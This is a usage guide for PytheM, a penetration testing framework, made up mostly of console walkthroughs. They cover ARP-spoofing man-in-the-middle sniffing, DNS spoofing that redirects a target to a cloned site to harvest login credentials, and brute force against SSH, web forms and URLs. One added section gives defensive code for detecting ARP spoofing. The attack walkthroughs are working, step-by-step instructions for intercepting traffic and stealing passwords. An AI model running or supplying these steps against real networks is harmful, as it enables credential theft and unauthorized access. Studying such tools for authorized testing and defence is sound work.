Python penetration testing framework: PytheM
PytheM is a Python penetration testing framework. It runs only on GNU/Linux systems.
Installation
$ sudo apt-get update
$ sudo apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev
$ sudo git clone https://github.com/m4n3dw0lf/PytheM/
$ cd PytheM
$ sudo pip install -r requirements.txt

Running
$ sudo ./pythem
Examples

ARP spoofing - HTTP man-in-the-middle attack
Commands:
pythem> set interface
[+] Enter the interface: wlan0
pythem> set gateway
[+] Enter the gateway: 192.168.1.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> sniff
[+] Enter the filter: http
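
A defender can spot the ARP spoofing shown above by watching for conflicting IP-to-MAC bindings. The following is an added example, not PytheM code or part of the original post: it checks the sender fields of both ARP requests and replies, so it covers either arpspoof mode (rep or req). The frame tuples, MAC addresses and the function name are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of observed ARP frames: (time_s, op, sender_ip, sender_mac).
# Requests and replies both carry a sender IP/MAC pair that receivers may cache.
SAMPLE_FRAMES = [
    (0.0, "request", "192.168.1.8", "aa:aa:aa:aa:aa:08"),  # host looks up gateway
    (0.1, "reply",   "192.168.1.1", "aa:aa:aa:aa:aa:01"),  # real gateway answers
    (5.0, "reply",   "192.168.1.1", "aa:aa:aa:aa:aa:66"),  # gateway IP, new MAC
    (5.0, "reply",   "192.168.1.8", "aa:aa:aa:aa:aa:66"),  # same MAC claims host
    (7.0, "request", "192.168.1.1", "aa:aa:aa:aa:aa:66"),  # forged sender in request
    (9.0, "reply",   "192.168.1.9", "aa:aa:aa:aa:aa:09"),  # benign new host
]


def detect_arp_spoofing(frames, pinned=None):
    """Return (time, kind, ip, mac, op) alerts for conflicting ARP bindings.

    pinned is an optional {ip: mac} map of known-good bindings, e.g. the
    gateway; any other IP is trusted on first use.
    """
    bindings = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in bindings.items():
        ips_by_mac[mac].add(ip)

    alerts = []
    for ts, op, ip, mac in frames:
        mac = mac.lower()
        # An IP that suddenly maps to a different MAC is the core poisoning sign.
        if bindings.setdefault(ip, mac) != mac:
            alerts.append((ts, "binding-change", ip, mac, op))
        # One MAC answering for several IPs is typical of a host in the middle.
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                alerts.append((ts, "mac-claims-multiple-ips", ip, mac, op))
    return alerts


if __name__ == "__main__":
    gateway = {"192.168.1.1": "aa:aa:aa:aa:aa:01"}
    for alert in detect_arp_spoofing(SAMPLE_FRAMES, pinned=gateway):
        print(alert)
```

Legitimate events such as DHCP lease reassignment, gateway failover (VRRP/HSRP) or proxy ARP also change bindings, so treat alerts as leads to confirm. Pinning the gateway's MAC, or enabling Dynamic ARP Inspection on switches that support it, removes the trust-on-first-use gap.
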
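ARP + DNS spoofing - redirect to a fake page and collect login credentials
Clone the site you have chosen with a cloning tool such as SET and deploy it on Apache2.
Commands:
pythem> set target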
[+] Enter the target(s): 192.168.0.8
pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[+] Domain to be spoofed: www.google.com
[+] IP address to be redirected: 192.168.0.6
[+] DNS spoofing initialized.
pythem> sniff dns
SSH brute force
pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123
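Web form parameter brute force
First obtain the parameter format the web page uses at login, id= value.
The redirect page is displayed; if it redirects to a different page, the guess was correct.
Commands:
pythem> set target http://127.0.0.1/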
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input id of the username box: vSIS_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root
URL content brute force
pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.
Features
[ PytheM – Penetration Testing Framework v0.3.2 ]
help: print the help message.
exit/quit: exit the program.
set: set the value of a variable. Parameters:
interface
gateway
target
file
arpmode
Examples:
pythem> set interface | open input to set
or
pythem> set interface wlan0 | don't open input to set value
print:
Print the value of a variable. Example:
pythem> print gateway
scan:
Run a tcp/manualport/arp scan. (Call it after setting the interface and the target.) Examples:
pythem> scan
or
pythem> scan tcp
arpspoof:
Start or stop an ARP spoofing attack. (The ARP spoofing mode can be set with rep or req: rep spoofs responses, req spoofs requests.)
Parameters:
start
stop
Examples:
arpspoof start
arpspoof stop
dnsspoof:
Start a DNS spoofing attack. (Call it after the ARP spoofing attack has started.) Examples:
pythem> dnsspoof start
pythem> dnsspoof stop
sniff:
Start sniffing packets. (Call it after setting the interface.) Examples:
pythem> sniff http
or
pythem> sniff
[+] Enter the filter: port 1337 and host 10.0.1.5 | tcpdump like format or http,dns specific filter.
pforensic:
Start analysing packets. (Call it after setting the interface and a .pcap file.) Example:
pythem> pforensic
pforensic> help
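brute-force:
Start a brute-force attack. (Call it after setting the target and the path to the wordlist file.) Parameters:
ssh | the target is an IP address
url | the target is a URL (including http:// or https://)
webform | the target is a URL (including http:// or https://)
Examples:
pythem> brute-force webform
pythem> brute-force ssh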
geoip:
Show the approximate location of an IP address. (Call it after setting the target (an IP address).) Examples:
pythem> geoip
or
pythem> geoip 8.8.8.8
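decode and encode:
Decode and encode a string in the chosen mode. Examples:
pythem> decode base64
pythem> encode ascii
cookiedecode:
Decode the value of a base64 URL-encoded cookie. Example:
pythem> cookiedecode
Other commands that can be run from the console, such as cd, ls, nano, cat, etc.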
Jarvis – voice-controlled assistant
[*] jarvis type jarvis-help to see the jarvis help page.
examples:
pythem> jarvis (invoke Jarvis in voice recognition mode)
pythem> jarvis-help (print the Jarvis help message)
pythem> jarvis-log (check the log)
pythem> jarvis-log err (check the error log)
pythem> jarvis-say (tell Jarvis to say something)
pythem> jarvis-say hello my name is jarvis.
pythem> jarvis-read (if no file is specified, call it after setting the file)
pythem> jarvis-read file.txt